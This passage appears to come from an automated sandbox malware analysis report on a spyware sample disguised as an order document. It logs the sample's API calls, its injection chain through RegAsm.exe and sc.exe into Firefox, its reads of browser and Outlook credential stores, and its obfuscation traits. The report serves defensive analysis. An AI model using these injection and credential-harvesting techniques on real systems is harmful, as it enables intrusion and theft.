                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028939B0 NtGetContextThread,1_2_028939B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02893D10 NtOpenProcessToken,1_2_02893D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02893D70 NtOpenThread,1_2_02893D70
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A04340 NtSetContextThread,LdrInitializeThunk,6_2_03A04340
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A04650 NtSuspendThread,LdrInitializeThunk,6_2_03A04650
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03A02BA0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03A02BE0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03A02BF0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02B60 NtClose,LdrInitializeThunk,6_2_03A02B60
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02AF0 NtWriteFile,LdrInitializeThunk,6_2_03A02AF0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02AD0 NtReadFile,LdrInitializeThunk,6_2_03A02AD0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02FB0 NtResumeThread,LdrInitializeThunk,6_2_03A02FB0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02FE0 NtCreateFile,LdrInitializeThunk,6_2_03A02FE0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02F30 NtCreateSection,LdrInitializeThunk,6_2_03A02F30
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03A02E80
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03A02EE0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03A02DF0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02DD0 NtDelayExecution,LdrInitializeThunk,6_2_03A02DD0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03A02D30
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03A02D10
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03A02CA0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02C60 NtCreateKey,LdrInitializeThunk,6_2_03A02C60
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03A02C70
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A035C0 NtCreateMutant,LdrInitializeThunk,6_2_03A035C0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A039B0 NtGetContextThread,LdrInitializeThunk,6_2_03A039B0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02B80 NtQueryInformationFile,6_2_03A02B80
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02AB0 NtWaitForSingleObject,6_2_03A02AB0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02FA0 NtQuerySection,6_2_03A02FA0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02F90 NtProtectVirtualMemory,6_2_03A02F90
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02F60 NtCreateProcessEx,6_2_03A02F60
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02EA0 NtAdjustPrivilegesToken,6_2_03A02EA0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02E30 NtWriteVirtualMemory,6_2_03A02E30
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02DB0 NtEnumerateKey,6_2_03A02DB0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02D00 NtSetInformationFile,6_2_03A02D00
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02CF0 NtOpenProcess,6_2_03A02CF0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02CC0 NtQueryVirtualMemory,6_2_03A02CC0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02C00 NtQueryInformationProcess,6_2_03A02C00
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A03090 NtSetValueKey,6_2_03A03090
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A03010 NtOpenDirectoryObject,6_2_03A03010
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A03D10 NtOpenProcessToken,6_2_03A03D10
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A03D70 NtOpenThread,6_2_03A03D70
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F39640 NtCreateFile,6_2_02F39640
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F397B0 NtReadFile,6_2_02F397B0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F39AC0 NtAllocateVirtualMemory,6_2_02F39AC0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F398B0 NtDeleteFile,6_2_02F398B0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F39960 NtClose,6_2_02F39960
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A0DBF96_2_03A0DBF9
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8FB766_2_03A8FB76
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A15AA06_2_03A15AA0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A71AA36_2_03A71AA3
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A6DAAC6_2_03A6DAAC
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A7DAC66_2_03A7DAC6
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A43A6C6_2_03A43A6C
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8FA496_2_03A8FA49
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A87A466_2_03A87A46
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A659106_2_03A65910
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D99506_2_039D9950
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039EB9506_2_039EB950
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D38E06_2_039D38E0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A3D8006_2_03A3D800
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D1F926_2_039D1F92
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8FFB16_2_03A8FFB1
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03993FD26_2_03993FD2
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03993FD56_2_03993FD5
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8FF096_2_03A8FF09
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D9EB06_2_039D9EB0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039EFDC06_2_039EFDC0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A87D736_2_03A87D73
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D3D406_2_039D3D40
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A81D5A6_2_03A81D5A
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8FCF26_2_03A8FCF2
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A49C326_2_03A49C32
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F221106_2_02F22110
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F1CFC06_2_02F1CFC0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F1B3206_2_02F1B320
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F1B3146_2_02F1B314
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F1B31C6_2_02F1B31C
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F1D1E06_2_02F1D1E0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F1B1D06_2_02F1B1D0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F257D06_2_02F257D0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F239D06_2_02F239D0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F3BF806_2_02F3BF80
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_0372E5636_2_0372E563
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_0372E4486_2_0372E448
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_037354D46_2_037354D4
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_0372D9C86_2_0372D9C8
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_0372E8FD6_2_0372E8FD
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_0372CC736_2_0372CC73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02895130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 028CEA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 028DF290 appears 103 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 028A7E54 appears 107 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0284B970 appears 262 times
                Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 03A17E54 appears 107 times
                Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 03A3EA12 appears 86 times
                Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 039BB970 appears 262 times
                Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 03A4F290 appears 103 times
                Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 03A05130 appears 58 times
                Source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721869696.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRIDE.dll* vs New Order - RCII900718_Contract Drafting.exe
                Source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1720676508.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs New Order - RCII900718_Contract Drafting.exe
                Source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721792816.0000000000FE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRIDE.dll* vs New Order - RCII900718_Contract Drafting.exe
                Source: New Order - RCII900718_Contract Drafting.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: New Order - RCII900718_Contract Drafting.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: New Order - RCII900718_Contract Drafting.exe, c4f54486cecec56b3df70dc7d0b0173ae.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                Source: New Order - RCII900718_Contract Drafting.exe, c68b42d019343789ff263031dfcd77c80.csBase64 encoded string: 'TmV3IE9yZGVyIC0gUkNJSTkwMDcxOF9Db250cmFjdCBEcmFmdGluZyQ='
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@5/4
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Order - RCII900718_Contract Drafting.exe.log
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\sc.exe File created: C:\Users\user\AppData\Local\Temp\04j58b6g
                Source: New Order - RCII900718_Contract Drafting.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: sc.exe, 00000006.00000003.2421499932.00000000032E9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2421347533.00000000032C8000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2977665984.00000000032E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: New Order - RCII900718_Contract Drafting.exeReversingLabs: Detection: 31%
                Source: New Order - RCII900718_Contract Drafting.exeVirustotal: Detection: 33%
                Source: unknown Process created: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe "C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe"
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
                Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\sc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: New Order - RCII900718_Contract Drafting.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: New Order - RCII900718_Contract Drafting.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: RIDE.pdb source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721869696.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721792816.0000000000FE0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167494215.000000000054E000.00000002.00000001.01000000.00000007.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2977812837.000000000054E000.00000002.00000001.01000000.00000007.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2242299628.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2240309306.0000000003638000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: RegAsm.pdb source: sc.exe, 00000006.00000002.2977665984.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2979542481.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.000000000257C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2532705070.0000000029ECC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: sc.pdbUGP source: ZrTbKDhAWYKJu.exe, 00000005.00000002.2978143078.0000000000997000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, sc.exe, sc.exe, 00000006.00000003.2242299628.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2240309306.0000000003638000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: RegAsm.pdb4 source: sc.exe, 00000006.00000002.2977665984.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2979542481.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.000000000257C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2532705070.0000000029ECC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: sc.pdb source: ZrTbKDhAWYKJu.exe, 00000005.00000002.2978143078.0000000000997000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: New Order - RCII900718_Contract Drafting.exe, cf2a4bb06922f42bd89f0b891d1b61c46.cs.Net Code: cb48b1adfa9c2725169d7374c67d3f787 System.Reflection.Assembly.Load(byte[])
                Source: New Order - RCII900718_Contract Drafting.exe, c8f1bb4de9963b88d3763aa7fcf12cf79.cs.Net Code: c0bc33011b8adf1b13e4a064148b8dee1 System.Reflection.Assembly.Load(byte[])
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040184C push E711456Eh; retf 1_2_00401809
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00416063 push esi; retf 1_2_0041606E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004021E1 push ss; retf 1_2_004021E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414992 push ebp; iretd 1_2_004149B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00417A42 push ss; iretd 1_2_00417A4C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004073CC push ds; iretd 1_2_00407424
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004073D3 push ds; iretd 1_2_00407424
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004163A6 push 0000005Ch; iretd 1_2_004163B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00403440 push eax; ret 1_2_00403442
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00418451 pushad ; iretd 1_2_00418474
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00411E78 push esp; ret 1_2_00411E79
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00408601 push ds; retf 1_2_00408602
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040AE01 push cs; ret 1_2_0040AE02
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040A763 push 689E092Ah; ret 1_2_0040A775
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0282225F pushad ; ret 1_2_028227F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028227FA pushad ; ret 1_2_028227F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0282283D push eax; iretd 1_2_02822858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028509AD push ecx; mov dword ptr [esp], ecx1_2_028509B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02821368 push eax; iretd 1_2_02821369
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028CBA04 push esi; retf 5_2_028CBA0F
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028CD3E3 push ss; iretd 5_2_028CD3ED
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028C7819 push esp; ret 5_2_028C781A
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028BDFA2 push ds; retf 5_2_028BDFA3
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028C07A2 push cs; ret 5_2_028C07A3
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028CEFE0 push cs; iretd 5_2_028CEFF5
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028CBD47 push 0000005Ch; iretd 5_2_028CBD53
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028BCD6D push ds; iretd 5_2_028BCDC5
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028BCD74 push ds; iretd 5_2_028BCDC5
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_0399225F pushad ; ret 6_2_039927F9
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039927FA pushad ; ret 6_2_039927F9
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039C09AD push ecx; mov dword ptr [esp], ecx6_2_039C09B6
                Source: New Order - RCII900718_Contract Drafting.exeStatic PE information: section name: .text entropy: 7.99304503862032
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\sc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

